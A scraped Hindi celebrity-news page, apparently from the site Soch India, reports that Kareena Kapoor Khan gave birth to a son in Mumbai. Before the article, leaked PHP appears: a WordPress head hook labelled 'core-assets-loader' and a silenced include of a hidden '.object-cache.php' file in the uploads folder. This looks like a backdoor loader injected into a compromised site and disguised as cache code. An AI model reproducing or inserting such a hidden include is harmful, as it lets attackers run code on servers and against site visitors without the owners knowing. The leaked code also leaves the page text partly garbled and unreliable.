add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अभिनेत्री करीना कपूर खान ने बेटे को दिया जन्म – SOCH INDIA
Menu

मनोरंजन
अभिनेत्री करीना कपूर खान ने बेटे को दिया जन्म

nobanner

बॉलीवुड की दिग्गज़ अभिनेत्री करीना कपूर खान के फैंस के लिए बड़ी खुशखबरी है. करीना कपूर ने बेटे को जन्म दिया है. नवाब पटौदी खानदान में ये खुशखबरी आज सुबह करीब 10 बजे आई.

करीना कपूर की डिलीवरी मुंबई के ब्रीच कैंडी हॉस्पिटल में हुई है. इस दौरान पति सैफ अली खान, सास शर्मिला टैगोर, बहन करिश्मा कपूर सहित दोनों सितारों का पूरा परिवार मौजूद रहा.

आपको बता दें कि अभी दो दिन पहले करीना कूपर प्री-क्रिसमस पार्टी में अपनी दोस्त मलाइका अरोड़ा खान और अमृता के साथ नजर आई थीं.

आपको बता दें कि सैफ और अभिनेत्री करीना कपूर अक्टूबर, 2012 में परिणय सूत्र में बंधे थे. इससे पहले सैफ ने अभिनेत्री अमृता सिंह से शादी की थी. अमृता से सैफ के दो बच्चे सारा और इब्राहिम हैं. सैफ अमृता से कुछ साल पहले अलग हो गए थे.

करीना कपूर अपनी प्रेग्नेंसी के दौरान भी लगातार काम करती रही हैं और सुर्खियों में छाई रही हैं. करीना कपूर ने इस दौरान कई फोटोशूट भी कराए हैं जिन्हें काफी पसंद किया गया है